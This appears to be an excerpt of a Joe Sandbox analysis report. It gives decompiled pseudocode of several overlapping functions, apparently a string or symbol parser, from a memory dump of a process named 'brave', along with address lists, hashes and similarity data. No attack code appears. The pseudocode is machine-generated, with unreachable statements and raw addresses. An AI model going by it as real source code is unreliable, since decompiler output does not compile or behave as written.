				 *((long long*)(_t210 + 4)) = 0;
				 *(__rbx + 0x28) = _t149 + 1;
				 *_t210 = 0x27;
				 *((long long*)(_t210 + 0x10)) = 0xa62b53e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0xa6005c22;
				E00007FF67FF6A6006EE0(_t210, __rbx);
				_a40 = _t210;
				if (_t210 == 0) goto 0xa6005c20;
				if ( *_t210 != 0x18) goto 0xa6005d39;
				goto 0xa6005c22;
				goto 0xa6006051;
				_t211 = _t210 + 1;
				 *(__rbx + 0x18) = _t211;
				E00007FF67FF6A60089F0(__rbx);
				E00007FF67FF6A6004DD0();
				_a40 = _t211;
				_t249 = _t211;
				goto 0xa6005f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t249[1]);
				E00007FF67FF6A60089F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0xa6006584;
				 *(__rbx + 0x18) = _t249;
				_t213 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0xa6005d30;
				_t259 = _a40;
				if (_t259 == 0) goto 0xa6005c20;
				_t152 =  *(__rbx + 0x38);
				if (_t152 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0xa6005c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t152 * 8)) = _t259;
				 *(__rbx + 0x38) = _t152 + 1;
				E00007FF67FF6A6004DD0();
				_a40 = _t213;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t259 + 3;
				E00007FF67FF6A6007F20(_t213, __rbx);
				_t250 = _t213;
				if (_t213 != 0) goto 0xa6006386;
				goto 0xa6005c20;
				asm("o16 nop [eax+eax]");
				_push(0xa62b53e0);
				_push(_t250);
				_push(__rbx);
				_t214 =  *(__rbx + 0x18);
				if (sil == 0) goto 0xa60066c8;
				 *(__rbx + 0x18) =  &(_t214[1]);
				r10d =  *_t214 & 0x000000ff;
				if (sil != 0) goto 0xa60066d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t127 = (r8d >> 0x1f) + r8d >> 1;
				_t182 =  *((intOrPtr*)( *((intOrPtr*)(0xa62b4820 + (_t127 + _t127 * 2) * 8)))) - r10b;
				if (_t182 == 0) goto 0xa6006680;
				if (_t182 <= 0) goto 0xa60066c0;
				r8d = _t127;
				if (0 != r8d) goto 0xa6006648;
				return 0;
			}

0x7ff6a6006249
0x7ff6a600624f
0x7ff6a6006266
0x7ff6a600626a
0x7ff6a6006272
0x7ff6a6006275
0x7ff6a600627b
0x7ff6a600627f
0x7ff6a6006288
0x7ff6a600628e
0x7ff6a60062a5
0x7ff6a60062a9
0x7ff6a60062b1
0x7ff6a60062b4
0x7ff6a60062ba
0x7ff6a60062be
0x7ff6a60062c7
0x7ff6a60062cd
0x7ff6a60062e4
0x7ff6a60062e8
0x7ff6a60062f0
0x7ff6a60062f3
0x7ff6a60062f9
0x7ff6a60062fd
0x7ff6a6006306
0x7ff6a600630c
0x7ff6a6006323
0x7ff6a6006327
0x7ff6a600632f
0x7ff6a6006332
0x7ff6a6006338
0x7ff6a600633c
0x7ff6a6006340
0x7ff6a600634e
0x7ff6a6006350
0x7ff6a6006356
0x7ff6a6006369
0x7ff6a600636d
0x7ff6a6006375
0x7ff6a6006378
0x7ff6a6006383
0x7ff6a6006386
0x7ff6a600638d
0x7ff6a6006393
0x7ff6a600639a
0x7ff6a600639e
0x7ff6a60063b1
0x7ff6a60063b6
0x7ff6a60063c0
0x7ff6a60063c6
0x7ff6a60063dd
0x7ff6a60063e1
0x7ff6a60063e9
0x7ff6a60063ec
0x7ff6a60063f2
0x7ff6a60063f6
0x7ff6a60063ff
0x7ff6a6006405
0x7ff6a600641c
0x7ff6a6006420
0x7ff6a6006428
0x7ff6a600642b
0x7ff6a6006431
0x7ff6a6006435
0x7ff6a600643e
0x7ff6a6006444
0x7ff6a600645b
0x7ff6a600645f
0x7ff6a6006467
0x7ff6a600646a
0x7ff6a6006470
0x7ff6a6006474
0x7ff6a6006480
0x7ff6a6006485
0x7ff6a6006493
0x7ff6a6006498
0x7ff6a60064a2
0x7ff6a60064a8
0x7ff6a60064bf
0x7ff6a60064c3
0x7ff6a60064cb
0x7ff6a60064ce
0x7ff6a60064d4
0x7ff6a60064d8
0x7ff6a60064dc
0x7ff6a60064eb
0x7ff6a60064f0
0x7ff6a60064f8
0x7ff6a6006501
0x7ff6a6006507
0x7ff6a6006512
0x7ff6a6006517
0x7ff6a600651e
0x7ff6a6006522
0x7ff6a6006537
0x7ff6a600653c
0x7ff6a6006541
0x7ff6a6006544
0x7ff6a6006550
0x7ff6a6006557
0x7ff6a600655e
0x7ff6a600656a
0x7ff6a600656c
0x7ff6a6006570
0x7ff6a6006575
0x7ff6a600657c
0x7ff6a600657f
0x7ff6a6006584
0x7ff6a600658c
0x7ff6a6006592
0x7ff6a6006598
0x7ff6a60065a8
0x7ff6a60065b2
0x7ff6a60065ba
0x7ff6a60065bf
0x7ff6a60065d0
0x7ff6a60065da
0x7ff6a60065de
0x7ff6a60065e6
0x7ff6a60065ec
0x7ff6a60065f2
0x7ff6a60065f7
0x7ff6a6006600
0x7ff6a6006601
0x7ff6a6006602
0x7ff6a6006607
0x7ff6a6006614
0x7ff6a600661e
0x7ff6a6006626
0x7ff6a600662d
0x7ff6a6006633
0x7ff6a6006642
0x7ff6a6006656
0x7ff6a6006666
0x7ff6a6006669
0x7ff6a600666b
0x7ff6a600666d
0x7ff6a6006673
0x7ff6a600667e

APIs

malloc.MSVCRT ref: 00007FF6A6032752

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: eff3cf0a3ead3182ce9a2d061d4ff4c747767f33054f4b93d232421270182bae
Instruction ID: ca4ae6237a418c6c33adc80e799a822f424134f5351d54e00ccc3b7d9ee38529
Opcode Fuzzy Hash: eff3cf0a3ead3182ce9a2d061d4ff4c747767f33054f4b93d232421270182bae
Instruction Fuzzy Hash: C1213A3260AB05C2E7208F14FA853A973B0FB94B49F258525D2CC873A9CF7ED594C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6006288 Relevance: 1.3, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00007FF67FF6A6006288(void* __eax, void* __ebx, void* __rbx, void* __rcx, void* __rdx, void* __r8, signed char* _a40) {
				signed int _t108;
				signed int _t119;
				signed int _t125;
				signed int _t127;
				signed int _t129;
				signed int _t132;
				signed int _t134;
				signed int _t136;
				signed int _t139;
				signed int _t142;
				void* _t171;
				intOrPtr* _t176;
				intOrPtr* _t179;
				intOrPtr* _t182;
				char* _t183;
				signed char* _t184;
				intOrPtr* _t187;
				intOrPtr* _t190;
				signed char* _t193;
				intOrPtr* _t196;
				signed char* _t197;
				signed char* _t199;
				signed char* _t200;
				intOrPtr* _t233;
				signed char* _t234;
				signed char* _t235;
				long long _t244;
				void* _t251;

				_t125 =  *(__rbx + 0x28);
				if (_t125 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa60326dc;
				_t176 = (_t125 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t176 + 4)) = 0;
				 *(__rbx + 0x28) = _t125 + 1;
				 *_t176 = 0x27;
				 *((long long*)(_t176 + 0x10)) = 0xa62b5320;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t127 =  *(__rbx + 0x28);
				if (_t127 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa60326a9;
				_t179 = (_t127 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t179 + 4)) = 0;
				 *(__rbx + 0x28) = _t127 + 1;
				 *_t179 = 0x27;
				 *((long long*)(_t179 + 0x10)) = 0xa62b53c0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				_t129 =  *(__rbx + 0x28);
				if (_t129 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032702;
				_t182 = (_t129 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t182 + 4)) = 0;
				 *(__rbx + 0x28) = _t129 + 1;
				 *_t182 = 0x27;
				 *((long long*)(_t182 + 0x10)) = 0xa62b5360;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0xa;
				goto 0xa6005c22;
				 *_t182 =  *_t182 + __eax;
				_t108 =  *(__rbx + 0x28);
				if (_t108 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6005c20;
				_t233 = (_t108 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t233 + 4)) = 0;
				 *(__rbx + 0x28) = _t108 + 1;
				 *_t233 = 0x42;
				 *((intOrPtr*)(_t233 + 0x10)) = E00007FF67FF6A6004E90(_t182, __rbx, __rdx, __r8, _t251);
				_t183 =  *(__rbx + 0x18);
				if ( *_t183 != 0x5f) goto 0xa6005c20;
				_t184 = _t183 + 1;
				 *(__rbx + 0x18) = _t184;
				E00007FF67FF6A6005BC0();
				E00007FF67FF6A6004DD0();
				_a40 = _t184;
				_t132 =  *(__rbx + 0x28);
				if (_t132 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032670;
				_t187 = (_t132 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t187 + 4)) = 0;
				 *(__rbx + 0x28) = _t132 + 1;
				 *_t187 = 0x27;
				 *((long long*)(_t187 + 0x10)) = 0xa62b5340;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t134 =  *(__rbx + 0x28);
				if (_t134 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032715;
				_t190 = (_t134 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t190 + 4)) = 0;
				 *(__rbx + 0x28) = _t134 + 1;
				 *_t190 = 0x27;
				 *((long long*)(_t190 + 0x10)) = 0xa62b5400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t136 =  *(__rbx + 0x28);
				if (_t136 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa60326ef;
				_t193 = (_t136 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t193 + 4)) = 0;
				 *(__rbx + 0x28) = _t136 + 1;
				 *_t193 = 0x27;
				 *((long long*)(_t193 + 0x10)) = 0xa62b53a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF67FF6A6005BC0();
				r9d = 0;
				E00007FF67FF6A6004DD0();
				_a40 = _t193;
				_t139 =  *(__rbx + 0x28);
				if (_t139 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032683;
				_t196 = (_t139 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t196 + 4)) = 0;
				 *(__rbx + 0x28) = _t139 + 1;
				 *_t196 = 0x27;
				 *((long long*)(_t196 + 0x10)) = 0xa62b53e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0xa6005c22;
				E00007FF67FF6A6006EE0(_t196, __rbx);
				_a40 = _t196;
				if (_t196 == 0) goto 0xa6005c20;
				if ( *_t196 != 0x18) goto 0xa6005d39;
				goto 0xa6005c22;
				goto 0xa6006051;
				_t197 = _t196 + 1;
				 *(__rbx + 0x18) = _t197;
				E00007FF67FF6A60089F0(__rbx);
				E00007FF67FF6A6004DD0();
				_a40 = _t197;
				_t234 = _t197;
				goto 0xa6005f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t234[1]);
				E00007FF67FF6A60089F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0xa6006584;
				 *(__rbx + 0x18) = _t234;
				_t199 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0xa6005d30;
				_t244 = _a40;
				if (_t244 == 0) goto 0xa6005c20;
				_t142 =  *(__rbx + 0x38);
				if (_t142 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0xa6005c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t142 * 8)) = _t244;
				 *(__rbx + 0x38) = _t142 + 1;
				E00007FF67FF6A6004DD0();
				_a40 = _t199;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t244 + 3;
				E00007FF67FF6A6007F20(_t199, __rbx);
				_t235 = _t199;
				if (_t199 != 0) goto 0xa6006386;
				goto 0xa6005c20;
				asm("o16 nop [eax+eax]");
				_push(0xa62b53e0);
				_push(_t235);
				_push(__rbx);
				_t200 =  *(__rbx + 0x18);
				if (sil == 0) goto 0xa60066c8;
				 *(__rbx + 0x18) =  &(_t200[1]);
				r10d =  *_t200 & 0x000000ff;
				if (sil != 0) goto 0xa60066d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t119 = (r8d >> 0x1f) + r8d >> 1;
				_t171 =  *((intOrPtr*)( *((intOrPtr*)(0xa62b4820 + (_t119 + _t119 * 2) * 8)))) - r10b;
				if (_t171 == 0) goto 0xa6006680;
				if (_t171 <= 0) goto 0xa60066c0;
				r8d = _t119;
				if (0 != r8d) goto 0xa6006648;
				return 0;
			}

0x7ff6a6006288
0x7ff6a600628e
0x7ff6a60062a5
0x7ff6a60062a9
0x7ff6a60062b1
0x7ff6a60062b4
0x7ff6a60062ba
0x7ff6a60062be
0x7ff6a60062c7
0x7ff6a60062cd
0x7ff6a60062e4
0x7ff6a60062e8
0x7ff6a60062f0
0x7ff6a60062f3
0x7ff6a60062f9
0x7ff6a60062fd
0x7ff6a6006306
0x7ff6a600630c
0x7ff6a6006323
0x7ff6a6006327
0x7ff6a600632f
0x7ff6a6006332
0x7ff6a6006338
0x7ff6a600633c
0x7ff6a6006340
0x7ff6a600634e
0x7ff6a6006350
0x7ff6a6006356
0x7ff6a6006369
0x7ff6a600636d
0x7ff6a6006375
0x7ff6a6006378
0x7ff6a6006383
0x7ff6a6006386
0x7ff6a600638d
0x7ff6a6006393
0x7ff6a600639a
0x7ff6a600639e
0x7ff6a60063b1
0x7ff6a60063b6
0x7ff6a60063c0
0x7ff6a60063c6
0x7ff6a60063dd
0x7ff6a60063e1
0x7ff6a60063e9
0x7ff6a60063ec
0x7ff6a60063f2
0x7ff6a60063f6
0x7ff6a60063ff
0x7ff6a6006405
0x7ff6a600641c
0x7ff6a6006420
0x7ff6a6006428
0x7ff6a600642b
0x7ff6a6006431
0x7ff6a6006435
0x7ff6a600643e
0x7ff6a6006444
0x7ff6a600645b
0x7ff6a600645f
0x7ff6a6006467
0x7ff6a600646a
0x7ff6a6006470
0x7ff6a6006474
0x7ff6a6006480
0x7ff6a6006485
0x7ff6a6006493
0x7ff6a6006498
0x7ff6a60064a2
0x7ff6a60064a8
0x7ff6a60064bf
0x7ff6a60064c3
0x7ff6a60064cb
0x7ff6a60064ce
0x7ff6a60064d4
0x7ff6a60064d8
0x7ff6a60064dc
0x7ff6a60064eb
0x7ff6a60064f0
0x7ff6a60064f8
0x7ff6a6006501
0x7ff6a6006507
0x7ff6a6006512
0x7ff6a6006517
0x7ff6a600651e
0x7ff6a6006522
0x7ff6a6006537
0x7ff6a600653c
0x7ff6a6006541
0x7ff6a6006544
0x7ff6a6006550
0x7ff6a6006557
0x7ff6a600655e
0x7ff6a600656a
0x7ff6a600656c
0x7ff6a6006570
0x7ff6a6006575
0x7ff6a600657c
0x7ff6a600657f
0x7ff6a6006584
0x7ff6a600658c
0x7ff6a6006592
0x7ff6a6006598
0x7ff6a60065a8
0x7ff6a60065b2
0x7ff6a60065ba
0x7ff6a60065bf
0x7ff6a60065d0
0x7ff6a60065da
0x7ff6a60065de
0x7ff6a60065e6
0x7ff6a60065ec
0x7ff6a60065f2
0x7ff6a60065f7
0x7ff6a6006600
0x7ff6a6006601
0x7ff6a6006602
0x7ff6a6006607
0x7ff6a6006614
0x7ff6a600661e
0x7ff6a6006626
0x7ff6a600662d
0x7ff6a6006633
0x7ff6a6006642
0x7ff6a6006656
0x7ff6a6006666
0x7ff6a6006669
0x7ff6a600666b
0x7ff6a600666d
0x7ff6a6006673
0x7ff6a600667e

APIs

malloc.MSVCRT ref: 00007FF6A6032752

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 0b72ed1d1ec91a9fecf57987d9700a88a3447d5267269d2675c8036d64f49d40
Instruction ID: a554f5f7b7ef9265863612f93200f1ab27d9ee5ad646b8619d6556fa24807c3b
Opcode Fuzzy Hash: 0b72ed1d1ec91a9fecf57987d9700a88a3447d5267269d2675c8036d64f49d40
Instruction Fuzzy Hash: 68114972A0AB05C2E7208F14EA803A973B0FB94B49F258525C2CC873A9CF7ED594C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600643E Relevance: 1.3, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00007FF67FF6A600643E(void* __rbx, signed char* _a40) {
				signed int _t61;
				signed int _t65;
				signed int _t68;
				signed int _t71;
				void* _t91;
				signed char* _t96;
				intOrPtr* _t99;
				signed char* _t100;
				signed char* _t102;
				signed char* _t103;
				signed char* _t124;
				signed char* _t125;
				long long _t132;

				_t65 =  *(__rbx + 0x28);
				if (_t65 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa60326ef;
				_t96 = (_t65 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t96 + 4)) = 0;
				 *(__rbx + 0x28) = _t65 + 1;
				 *_t96 = 0x27;
				 *((long long*)(_t96 + 0x10)) = 0xa62b53a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF67FF6A6005BC0();
				r9d = 0;
				E00007FF67FF6A6004DD0();
				_a40 = _t96;
				_t68 =  *(__rbx + 0x28);
				if (_t68 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032683;
				_t99 = (_t68 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t99 + 4)) = 0;
				 *(__rbx + 0x28) = _t68 + 1;
				 *_t99 = 0x27;
				 *((long long*)(_t99 + 0x10)) = 0xa62b53e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0xa6005c22;
				E00007FF67FF6A6006EE0(_t99, __rbx);
				_a40 = _t99;
				if (_t99 == 0) goto 0xa6005c20;
				if ( *_t99 != 0x18) goto 0xa6005d39;
				goto 0xa6005c22;
				goto 0xa6006051;
				_t100 = _t99 + 1;
				 *(__rbx + 0x18) = _t100;
				E00007FF67FF6A60089F0(__rbx);
				E00007FF67FF6A6004DD0();
				_a40 = _t100;
				_t124 = _t100;
				goto 0xa6005f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t124[1]);
				E00007FF67FF6A60089F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0xa6006584;
				 *(__rbx + 0x18) = _t124;
				_t102 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0xa6005d30;
				_t132 = _a40;
				if (_t132 == 0) goto 0xa6005c20;
				_t71 =  *(__rbx + 0x38);
				if (_t71 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0xa6005c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t71 * 8)) = _t132;
				 *(__rbx + 0x38) = _t71 + 1;
				E00007FF67FF6A6004DD0();
				_a40 = _t102;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t132 + 3;
				E00007FF67FF6A6007F20(_t102, __rbx);
				_t125 = _t102;
				if (_t102 != 0) goto 0xa6006386;
				goto 0xa6005c20;
				asm("o16 nop [eax+eax]");
				_push(0xa62b53e0);
				_push(_t125);
				_push(__rbx);
				_t103 =  *(__rbx + 0x18);
				if (sil == 0) goto 0xa60066c8;
				 *(__rbx + 0x18) =  &(_t103[1]);
				r10d =  *_t103 & 0x000000ff;
				if (sil != 0) goto 0xa60066d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t61 = (r8d >> 0x1f) + r8d >> 1;
				_t91 =  *((intOrPtr*)( *((intOrPtr*)(0xa62b4820 + (_t61 + _t61 * 2) * 8)))) - r10b;
				if (_t91 == 0) goto 0xa6006680;
				if (_t91 <= 0) goto 0xa60066c0;
				r8d = _t61;
				if (0 != r8d) goto 0xa6006648;
				return 0;
			}

0x7ff6a600643e
0x7ff6a6006444
0x7ff6a600645b
0x7ff6a600645f
0x7ff6a6006467
0x7ff6a600646a
0x7ff6a6006470
0x7ff6a6006474
0x7ff6a6006480
0x7ff6a6006485
0x7ff6a6006493
0x7ff6a6006498
0x7ff6a60064a2
0x7ff6a60064a8
0x7ff6a60064bf
0x7ff6a60064c3
0x7ff6a60064cb
0x7ff6a60064ce
0x7ff6a60064d4
0x7ff6a60064d8
0x7ff6a60064dc
0x7ff6a60064eb
0x7ff6a60064f0
0x7ff6a60064f8
0x7ff6a6006501
0x7ff6a6006507
0x7ff6a6006512
0x7ff6a6006517
0x7ff6a600651e
0x7ff6a6006522
0x7ff6a6006537
0x7ff6a600653c
0x7ff6a6006541
0x7ff6a6006544
0x7ff6a6006550
0x7ff6a6006557
0x7ff6a600655e
0x7ff6a600656a
0x7ff6a600656c
0x7ff6a6006570
0x7ff6a6006575
0x7ff6a600657c
0x7ff6a600657f
0x7ff6a6006584
0x7ff6a600658c
0x7ff6a6006592
0x7ff6a6006598
0x7ff6a60065a8
0x7ff6a60065b2
0x7ff6a60065ba
0x7ff6a60065bf
0x7ff6a60065d0
0x7ff6a60065da
0x7ff6a60065de
0x7ff6a60065e6
0x7ff6a60065ec
0x7ff6a60065f2
0x7ff6a60065f7
0x7ff6a6006600
0x7ff6a6006601
0x7ff6a6006602
0x7ff6a6006607
0x7ff6a6006614
0x7ff6a600661e
0x7ff6a6006626
0x7ff6a600662d
0x7ff6a6006633
0x7ff6a6006642
0x7ff6a6006656
0x7ff6a6006666
0x7ff6a6006669
0x7ff6a600666b
0x7ff6a600666d
0x7ff6a6006673
0x7ff6a600667e

APIs

malloc.MSVCRT ref: 00007FF6A6032752

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: d48a312505f0d7753b5e0af4059756c973b08e8edd7f46ab5558ae8c63b7ed28
Instruction ID: c4b5a57e39ba6cdff9de03931961156638319ca6eabd2b273ecee19063a4bde2
Opcode Fuzzy Hash: d48a312505f0d7753b5e0af4059756c973b08e8edd7f46ab5558ae8c63b7ed28
Instruction Fuzzy Hash: 9A114F7290AB01C6E7108F14EA803A973B0FF94B49F158535D28C873A9DF7ED590C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6006306 Relevance: 1.3, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00007FF67FF6A6006306(void* __eax, void* __ebx, void* __rbx, void* __rcx, void* __rdx, void* __r8, signed char* _a40) {
				signed int _t92;
				signed int _t103;
				signed int _t109;
				signed int _t112;
				signed int _t114;
				signed int _t116;
				signed int _t119;
				signed int _t122;
				void* _t149;
				intOrPtr* _t154;
				char* _t155;
				signed char* _t156;
				intOrPtr* _t159;
				intOrPtr* _t162;
				signed char* _t165;
				intOrPtr* _t168;
				signed char* _t169;
				signed char* _t171;
				signed char* _t172;
				intOrPtr* _t203;
				signed char* _t204;
				signed char* _t205;
				long long _t214;
				void* _t221;

				_t109 =  *(__rbx + 0x28);
				if (_t109 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032702;
				_t154 = (_t109 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t154 + 4)) = 0;
				 *(__rbx + 0x28) = _t109 + 1;
				 *_t154 = 0x27;
				 *((long long*)(_t154 + 0x10)) = 0xa62b5360;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0xa;
				goto 0xa6005c22;
				 *_t154 =  *_t154 + __eax;
				_t92 =  *(__rbx + 0x28);
				if (_t92 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6005c20;
				_t203 = (_t92 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t203 + 4)) = 0;
				 *(__rbx + 0x28) = _t92 + 1;
				 *_t203 = 0x42;
				 *((intOrPtr*)(_t203 + 0x10)) = E00007FF67FF6A6004E90(_t154, __rbx, __rdx, __r8, _t221);
				_t155 =  *(__rbx + 0x18);
				if ( *_t155 != 0x5f) goto 0xa6005c20;
				_t156 = _t155 + 1;
				 *(__rbx + 0x18) = _t156;
				E00007FF67FF6A6005BC0();
				E00007FF67FF6A6004DD0();
				_a40 = _t156;
				_t112 =  *(__rbx + 0x28);
				if (_t112 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032670;
				_t159 = (_t112 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t159 + 4)) = 0;
				 *(__rbx + 0x28) = _t112 + 1;
